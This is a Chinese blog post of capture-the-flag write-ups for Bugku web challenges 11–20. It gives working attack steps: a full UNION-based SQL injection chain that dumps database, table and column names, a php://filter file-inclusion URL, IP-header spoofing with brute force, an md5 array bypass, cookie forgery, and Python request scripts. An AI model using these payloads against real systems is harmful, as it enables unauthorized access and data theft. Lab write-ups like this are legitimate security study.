Bugku 做题记录 web11~20

最新推荐文章于 2021-07-06 10:50:32 发布
最新推荐文章于 2021-07-06 10:50:32 发布
阅读量340 收藏
点赞数
分类专栏: 做题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Goodric/article/details/114254569
版权

Bugku题目web方向

web11

在这里插入图片描述
打开场景找不到什么线索,题目中提示 后门。
用御剑扫描一下后台,扫描到了 /shell.php

打开 /shell.php 后台。
在这里插入图片描述
——
——

web12

打开场景,是一个登陆界面。
尝试登录,发现两个问题,一个账号密码都不知道,还有下面回显提示 IP 禁止访问。
在这里插入图片描述
F12 查看源代码,看到一条或许有用的信息:一段编码,经过 base64 解码得到 text123 ,应该是密码。
在这里插入图片描述
然后用 burp 拦截登录时的那个数据包。
可以先发送到 Intruder 模块进行爆破账号,先加上 X-Forwarded-For:127.0.0.1 的 post 请求。
当然也可以同时爆破账号和密码,不过会更麻烦。
爆破得到 user=admin

发送到 Repeater 模块测试,得到 flag 。
在这里插入图片描述
——
——

web13

在这里插入图片描述
提示查看源代码
可以看到有一段 JavaScript 代码,在最后直接说明了用 unexcape 解码。
解码组合为 p1内容+%35%34%61%61%32+p2内容。
在这里插入图片描述
得到解码内容,把 if 中的内容复制输入在输入框中,提交得到 flag 。
在这里插入图片描述
——
——

web14

在这里插入图片描述
打开场景,页面只显示了 index.php ,并且 url 上有一个参数 file 。
在这里插入图片描述
运用 php 协议,修改 file 的值,构造出 url :
http://114.67.246.176:14523/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
页面上就回显了一段 base64 的编码。

把经过 base64 编码的回显内容解码得到flag 。
在这里插入图片描述
——
——

web15

在这里插入图片描述
打开场景,需要输入 5 位数密码。
在这里插入图片描述
看到密码一般用 burp 进行暴力破解,不过会因为字典原因且没有线索爆破比较麻烦,耗时长。
也有编写 python 脚本的。
最后密码是:12468 ,进去之后就直接得到 flag 。
——
——

web16

在这里插入图片描述
进入场景之后,没有什么有用的信息,根据题目的提示是找一个备份文件。
备份文件都有文件拓展名,而 php的备份有两种: .php 和 .php.bak
尝试输入得以下载备份文件。
在这里插入图片描述
打开文件,是一段代码。
在这里插入图片描述
代码中要求 md5 加密后的 key1 和 key2 ,使 key1==key2 ,且 key1!==key2
然后就要想到 md5 无法处理数组,则构造 get 请求:
?kekeyy1[]=[1]&kekeyy2[]=[2]
得到 flag 。
在这里插入图片描述
——
——

web17

在这里插入图片描述
打开场景,应该就可以判断出是 sql 注入类的题了。
在这里插入图片描述
输入 1’ or 1=1 # 成功回显,判断为字符型注入。
先用 order by 判断字段数:

1’ order by 1 #

当 order by 后面的数字为 5 时,页面没有回显,说明字段数为 4 。

判断存在注入点:

-1’ union select 1,2,3,4

得到 2,3,4 位置存在回显。
在这里插入图片描述

再使用 union 联合查询。
爆当前数据库名:

-1’ union select 1,2,3,database() #

得到数据库名为 skctf 。
在这里插入图片描述

爆表名:

-1’ union select 1,2,3,table_name from information_schema.tables where table_schema=‘skctf’ #

得到表名 fl4g 。
在这里插入图片描述

查列名:

-1’ union select 1,2,3,column_name from information_schema.columns where table_schema=‘skctf’ and table_name=‘fl4g’ #

得到列名 skctf_flag
在这里插入图片描述
查具体数据:

-1’ union select 1,2,3,skctf_flag from fl4g #

得到数据 flag 。
在这里插入图片描述
——
——

web18

在这里插入图片描述
一打开场景,需要进行计算,感觉没有哪里有什么线索。
在这里插入图片描述
我本来是想尝试瞎猜 get 请求,结果发现每次请求页面上的计算题都会变。
实际上直接按刷新界面就会有所不同。
一直刷新,直到界面出现一句话,给了一点线索。大概叫我们对 value 进行 post 请求。
在这里插入图片描述
这里尝试慢慢算出答案再用 hackbar 发送 post 请求是行不通的,因为页面过了 2 秒之后就不响应了。
果然只能老司机来。

查其他人的 writeup 得知可以用 python 脚本。(我还不会python)
给出一个别人现成的代码。

import requests
import re
url = 'http://114.67.246.176:15441/'  #这里是自己的网址
s = requests.Session()
source = s.get(url)
expression = re.search(r'(\d+[+\-*])+(\d+)', source.text).group()
result = eval(expression)
post = {'value': result}
print(s.post(url, data = post).text)

刚开始我用自己的 pycharm 运行的时候出现错误提示没有 requests 这个模块。
那就先安装 requests ,网上有很多教程。
在这里插入图片描述
我原来的 python 版本是 2.7 ,结果一直装不了,后面重新下载 3.9 版本就可以了。
安装好 requests 后,就可以运行了。
运行一下可能没有出现 flag ,要多运行几次就得到 flag 了。
在这里插入图片描述
——
——

web19

在这里插入图片描述
打开场景页面中只有一句话,没有什么线索。
查看源代码,出现“now you have to post the margin what you find ”可能有用。
在这里插入图片描述
再看看其他位置,在网络的消息头位置看到一个 flag 。
后面一段 base64 编码,果断拿去解码得到:“跑的还不错,给你flag吧: OTYxMjI2”
这里没有得到真正的 flag ,把解码得到的 flag 再解码一次可以得到一串数字。
在这里插入图片描述
得到的一串数字可能是某个值,参数就可以回想到前面源代码中的 margin ,需要进行 post 请求。
但是这样进行请求也是没有,如题目所说速度要快,所以得用代码跑。
python 脚本:

import requests
import base64
url = "http://114.67.246.176:15735/"
r = requests.session()
headers = r.get(url).headers # 因为flag在消息头里

mid = base64.b64decode(headers['flag'])
mid = mid.decode() # 为了下一步用split不报错,b64decode后操作的对象是byte类型的字符串,而split函数要用str类型的

flag = base64.b64decode(mid.split(':')[1]) # 获得flag:后的值
data = {'margin': flag}
print(r.post(url, data).text) # post方法传上去

得到 flag 。
在这里插入图片描述
——
——

web20

在这里插入图片描述
打开场景,只看到没什么用的一串字母,源代码消息头中都没有什么线索。
不过可以看到 url 中有两个参数 line 和 filename 。
line 后面没有值,我们或许可以加,filename 后面的值解码后为 keys.txt
在这里插入图片描述
虽然参数已经是 keys.txt,但是页面上并没有 flag ,根据题目要求可能要传 cookie 进行欺骗,但是现在不知道 cookie 的值。
url 中 get 请求前面还有一个 index.php ,尝试把参数 filename 的值改为 aW5kZXgucGhw (inedex.php)
这个时候修改 line 后面的值,可以得到不同的代码。
在这里插入图片描述
可以一条一条把代码全部显现出来,就是比较麻烦。
可以用 python 代码:

#!/usr/bin/env python

-- coding: utf-8 --

import requests

s = requests.Session() url =
‘http://123.206.87.240:8002/web11/index.php’ for i in range(1, 20):
payload = {‘line’: str(i), ‘filename’: ‘aW5kZXgucGhw’} a = s.get(url,
params=payload).content content = str(a, encoding=“utf-8”)
print(content)

运行后得到所有源码:

error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>

根据源码,用 burp 伪造 cookie。
注意原本的 filename 的值是 a2V5cy50eHQ=(keys.txt),需要改为 a2V5cy5waHA=(keys.php)
在 burp 上把原本有的 cookie 值改为 margin=margin
得到flag 。
在这里插入图片描述

Goodric
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BugKu-web篇-web11
jiuyongpinyin的博客
05-29 116
web11 打开题目,首先查看源码,乱七八糟的也看不懂,那就先dirsearch扫描一下目录看看 发现有三个目录,逐一查看,发现shell.php是这样的 密码随便试了一个123456 让我别乱骑,手工试了好多常见的,都不是,那就只能上字典了,这里给大家推荐一个字典合集 https://github.com/insightglacier/Dictionary-Of-Pentesting 用BP字典的暴力破解应该也可以解出来,但是我等了一会实在等不起了,用这个字典里的 就可以爆破出来了,密码是hac
BugKu [CTF] web11
weixin_45253622的博客
05-07 156
Web11 网站被黑了 黑客会不会留下后门,我们使用目录扫描工具进行扫描,看看有没有后台。 存在shell.php 我们访问发现: 使用burp暴力破解。 登录出结果。 Web12
BugkuCTF web_11-20
H4ppyD0g的博客
07-19 990
11 web5 jsfuck是一种替换密码,由( ) [ ] { } ! + 等符号组成。 用解密工具解密一下,或者把那些东西放到console里面回车一下,就会爆出flag。 ———————————— 12 头等舱 bp抓包,发送到spider,在target里面的response里可以找到flag。 ———————————— 13 网站被黑 扫描后台发现一个shell.php 访问后出现登陆...
bugku 1~11题 write up(web
giun的博客
03-06 668
一、第一题(web2) 查看源代码,查找flag,即可得出flag。 二、第二题(计算器) 输入163,发现只能输入一位数。位数被限制了。我们使用火狐浏览器的开发者工具(F12)调出来。定位到输入框的位置。发现 最大位数被限制了,把1改成3即可得出flag。 三、第三题(web基础$_GET) 打开题目发现是PHP代码,阅读代码可知,我们在URL中传入参数?what=flag即可得出flag ...
bugku题的web类解析
01-29
这个是我自习写的bugkuweb的解析,其中四个题因为各种原因没有做出来,分别为welcome to bugku,孙xx的博客,login2,login4。也许有写的不好的地方,见谅,
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
bugku web题INSERT INTO注入.docx
05-16
bugku web题INSERT INTO注入 明确注入点,是走的http报头的x-forwarded-for。  我尝试了bool型注入,发现自己构造的语句在自己数据库中会报错,但是这里并没有错误报告,因此考虑基于时间的盲注
bugku杂项题writeup
11-22
bugku杂项题writeup
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
Bugku CTF web11Web
ChaoYue_miku的博客
02-22 570
0、打开网页,没有发现特殊提示 1、使用御剑扫目录 发现shell.php页面 此时需要输入密码PASS 2、使用BurpSuite进行爆破 可以得到密码hack 注意:由于使用的字典不相同,可能出现爆破时间过长或无法得到正确结果的情况,故介绍另一种方法: 3、查看题目提示 网站被黑了 黑客会不会留下后门 看到黑客会不会留下后门,因此尝试一下hack(脑洞比较大) 4、得到flag:flag{2f07593056dd95f344fdc337e1208198} .
BugkuCTF web_41-45
H4ppyD0g的博客
08-11 464
41 文件包含2 ————————————
BugkuCTF web11_网站被黑 writeup
Mitchell_Donovan的博客
12-21 1290
web11.网站被黑 原题链接 key:御剑后台扫描+burpsuite密码爆破 知识补充: webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文 与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 顾名思义,"web"的含义是显然需要服务器开放web服务,"shell"的含义是取
Bugku web41
qq_53460654的博客
05-08 244
打开环境 所以进行代码审计 <?php // php版本:5.4.44 header("Content-type: text/html; charset=utf-8");//请求头 highlight_file(__FILE__);//高亮显示 class evil{ public $hint;//定义变量 public function __construct($hint){//构造函数,主要实现重载功能 $this->hint = $hint;//为hi
ctfshow 信息搜集模块做题 web1~20
Goodric的博客
05-16 2028
ctfshow 信息搜集模块做题 web1~20 VIP 题目限时开放,这不先冲~ 限免模块有二十题,就是 WEB 入门模块里的前二十题 web1~web20 。(web 入门模块里的信息搜集小模块) —— —— 源码泄露(web1) 题目描述: 开发注释未及时删除 直接 F12 得到源码注释里的 flag 。 —— —— 前台JS绕过(web2) 打开环境,显示:无法查看源代码。 尝试一下,的确无法按 F12 查看源代码。 既然是前端,可以刷新页面用 burp 抓包,点击发送就可以看到源代码了,得到
bugku web40
weixin_50597969的博客
03-09 1645
bugku web40 做题记录猜测git泄露解题 猜测git泄露 url:http://ip_address/.git 发现确实存在git泄露 解题 在kali中递归下载 .git目录文件 ????得到一个文件夹 wget -r http://ip_address/.git 在上一步得到的文件夹中执行命令???? 1、 git reflog //查看执行的命令日志 2、 git reset 13ce8d0 //回退到该版本的版本库 多试几个commit id 3、 git sta
Bugku WEB 速度要快
qq_41696858的博客
07-06 179
同时需要注意的一次解码的仍然是base64编码的,两次解码,得到margin带过去就好 至于margin,熟悉CSS的知道他是边距,当然是个数字 写脚本 #! /usr/bin/python import requests import re import base64 s=requests.session() url=“http://114.67.246.176:17375/” result=s.get(url).headers print(result) flag1=result[‘flag’] str
BUGKU-WEB-WEB41
qq_25755011的博客
04-21 1347
一道反序列化字符串逃逸+ssrf的综合题 解题思路 字符串逃逸 题目源码如下: <?php // php版本:5.4.44 header("Content-type: text/html; charset=utf-8"); highlight_file(__FILE__); class evil{ public $hint; public function __construct($hint){ $this->hint = $hint; }
Bugku-WEB-cookies欺骗(缺一个python脚本)
Jaychouzzk
11-24 398
题目: 这里注意到filename=a2V5cy50eHQ=,应该是base64编码,解码一下,得到了keys.txt 想想应该怎么利用一下呢。题目是cookies欺骗,可能keys.txt中应该存在我们所需要的cookies   解题:这里想错了。。没仔细去看url,明显是打开的keys.txt才输出的这么多字符串,line应该是对应的行数 尝试打开index.php看看是否能将其...
Bugku-web(三)
weixin_44866139的博客
02-18 316
welcom to bugku 题目好像不能访问了,看看其他博主的博客吧 https://www.cnblogs.com/Pinging/p/8278168.html 过狗一句话 <?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_...
bugku s3 awd排位赛-11
最新发布
12-08
bugku s3 awd排位赛-11是指《步步高升》第三季的AWD排位赛第11场比赛。在这场比赛中,选手们将使用AWD(全驱)车辆进行排位赛,争夺最佳的出发位置。 在这场比赛中,选手们需要在赛道上展现出极致的驾驶技术和车辆...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Goodric

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值